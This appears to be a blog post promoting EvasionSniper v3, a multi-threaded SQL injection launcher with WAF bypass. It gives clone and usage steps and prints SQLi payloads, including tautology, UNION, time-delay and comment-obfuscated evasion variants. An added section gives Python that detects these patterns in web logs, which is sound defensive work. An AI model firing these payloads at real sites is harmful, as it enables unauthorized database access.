[EvasionSniper v3] SQLi Payload Launcher with WAF Bypass

[EvasionSniper v3] SQLi Payload Launcher with WAF Bypass by 0x6ick

0x6ick is back with EvasionSniper v3, a tool for hardcore pentesters who need a fast, multi-threaded payload launcher with built-in WAF bypass support.

⚠️ Disclaimer: This tool is strictly for educational purposes and authorized penetration testing only. I do not support or condone any illegal hacking activities.

Key Features

  • Built-in OWASP + Custom Payload Pool
  • Multi-threaded Launcher
  • Randomized Headers & Payload Obfuscation
  • Basic WAF Detection & Auto-switch
  • Auto-save scan results (if >20 payloads)
  • Fancy ASCII banner & Colored Output
  • Progress Counter & Friendly Prompt

(Sample Output)

Installation & Clone

git clone https://github.com/6ickzone/EvasionSniper.git

cd EvasionSniper

pip install -r requirements.txt

Manual Option (for those who cannot clone)

  1. Open the raw script link: https://raw.githubusercontent.com/6ickzone/EvasionSniper/main/main.py
  2. In Termux or Linux:
    curl -s https://raw.githubusercontent.com/6ickzone/EvasionSniper/main/main.py -o main.py
    chmod +x main.py
  3. Make sure `requirements.txt` contains:
    requests
    colorama
  4. Install dependencies:
    pip install -r requirements.txt

Usage

python3 main.py

# Then fill in the prompts:

# Enter target URL (e.g., http://site.com/page.php): http://target.com/index.php

# Enter vulnerable param (e.g., id): id

# Threads (default 5): [Enter]

# Custom payload file (optional): payloads.txt

# Save results to file (optional): result.txt

The tool automatically fires the payloads across multiple threads, marks each result as Passed (200 OK) or Blocked (403/406), and saves the results to a file if needed.

OWASP Payload List (SQL Injection Bypassing WAF)

Full reference & additional variants: OWASP SQL Injection Bypassing WAF Cheat Sheet

' OR '1'='1'--

' OR 1=1--

' UNION SELECT NULL--

' OR SLEEP(5)--

' OR benchmark(5000000,MD5(1))--

' OR 2 LIKE 2--

'/**/OR/**/1=1--

'/*!50000UNION*/ SELECT NULL--

...and many more, per the OWASP Cheat Sheet...
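
For the defending side of the payload list above, this added example (not part of EvasionSniper or the original post) strips MySQL comment obfuscation from logged query parameters before matching, so that `/**/` and `/*!50000...*/` variants hit the same rules as the plain forms. The log lines are constructed in a simplified layout, and the rule names and the `scan` / `reached_app` helpers are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in a simplified access-log layout: ip "request" status
SAMPLE_LOG = [
    '192.0.2.10 "GET /index.php?id=42 HTTP/1.1" 200',
    '192.0.2.10 "GET /search.php?q=black+or+white HTTP/1.1" 200',
    '198.51.100.23 "GET /index.php?id=1%27%2F**%2FOR%2F**%2F1%3D1-- HTTP/1.1" 200',
    '198.51.100.23 "GET /index.php?id=1%27%2F*!50000UNION*%2F+SELECT+NULL-- HTTP/1.1" 403',
    '198.51.100.23 "GET /index.php?id=1%27+OR+SLEEP(5)-- HTTP/1.1" 200',
]

LINE_RE = re.compile(r'^(\S+) "\S+ (\S+) [^"]*" (\d{3})$')
# Hypothetical rule set covering the payload families listed on this page.
RULES = {
    "tautology": re.compile(r"\bor\s+'?(\w+)'?\s*(?:=|like)\s*'?\1\b"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "time_delay": re.compile(r"\b(?:sleep|benchmark)\s*\("),
}

def normalize(value):
    """Undo comment-based obfuscation so the rules see what MySQL would parse."""
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)  # /*!50000UNION*/ -> UNION
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)            # /**/ -> space
    return re.sub(r"\s+", " ", value).lower()

def scan(lines):
    """Return (ip, param, rule, status) for every rule hit in a query parameter."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the simplified layout
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qsl percent-decodes names and values and turns '+' into a space
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            clean = normalize(value)
            findings += [(ip, param, name, status)
                         for name, rx in RULES.items() if rx.search(clean)]
    return findings

def reached_app(findings):
    """Hits answered with 200 were not blocked upstream; triage these first."""
    return [f for f in findings if f[3] == 200]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A client whose requests alternate between 403/406 and 200 on the same parameter matches the Passed/Blocked probing pattern described above; the 200 responses are the ones that got past the WAF and reached the application.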

⚠️ Legal Disclaimer:
This tool is developed solely for educational and authorized penetration testing only. Any misuse for unauthorized access, hacking, or criminal activities is strictly prohibited. The author (0x6ick, NyxCode) is not responsible for any consequences arising from unlawful use.

Download & Contribute

👉 Clone or fork the repo on GitHub

You can also fork the repo or open an issue to request new features.

Next Update (v4)

– Auto-detect error-based & time-based SQLi
– Dynamic WAF fingerprinting & payload pools
– Progress bar & lightweight GUI
